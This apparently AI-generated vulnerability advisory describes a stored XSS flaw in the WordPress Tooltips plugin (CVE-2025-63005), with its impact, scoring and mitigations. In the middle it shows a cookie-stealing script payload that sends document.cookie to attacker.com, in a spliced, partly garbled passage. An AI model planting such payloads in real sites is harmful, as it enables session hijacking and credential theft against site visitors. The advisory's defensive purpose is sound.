
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-63005 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress Tooltips plugin developed by Tomas. It allows authenticated attackers with low privileges (Contributor/Developer role) to inject persistent malicious scripts via web page generation. The vulnerability affects WordPress Tooltips versions up to and including 10.9.3 (initially reported as through 10.7.9, later updated). It was published on December 31, 2025, by Patchstack, and carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), a Stored XSS variant. An authenticated user with at least Contributor-level access can inject malicious JavaScript payloads through the plugin's tooltip configuration or content fields, which are then persistently stored and rendered to site visitors without adequate sanitization or output escaping. Exploitation requires user interaction — a privileged user or site visitor must load the affected page containing the injected tooltip content. The vulnerability was discovered and reported by researcher 'zaim' on October 27, 2025, and assigned a Patchstack ID of PSID18ce82171320 (Patchstack).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of site visitors who view pages containing the malicious tooltip content, enabling session hijacking, credential theft, malicious redirects, and defacement. Because the payload is stored server-side, all visitors to affected pages are at risk without any further attacker interaction. The scope is changed (S:C in CVSS), meaning the impact extends beyond the plugin itself to the broader WordPress site and its users, with low confidentiality, integrity, and availability impacts per the CVSS assessment (Patchstack, Red Hat CVE).
As of the time of reporting, no official patch is available for the WordPress Tooltips plugin, and Patchstack notes no VDP (Vulnerability Disclosure Program) is in place for this plugin (Patchstack). The EPSS score is approximately 0.033%, indicating a low probability of active exploitation in the near term. No in-the-wild exploitation, threat actor attribution, or inclusion in CISA's Known Exploited Vulnerabilities (KEV) catalog has been reported. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites at scale.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a tooltip field.<script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads stored in the WordPress database within tooltip-related fields or post meta.As of the disclosure date, no official patched version of the WordPress Tooltips plugin has been released (Patchstack). Site administrators should consider disabling or removing the WordPress Tooltips plugin until a patch is available. Access to Contributor and higher roles should be restricted to trusted users only. Patchstack customers receive virtual patching (early warning mitigation) as an interim measure. Monitoring for unexpected script content in tooltip fields and reviewing user-submitted content are recommended defensive steps.
The vulnerability was reported by researcher 'zaim' through Patchstack's vulnerability disclosure process and published on December 31, 2025. Patchstack classified it as low priority with no impactful threat at the time of disclosure. No significant vendor statements, notable researcher commentary, or major media coverage has been identified beyond standard vulnerability database aggregation (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."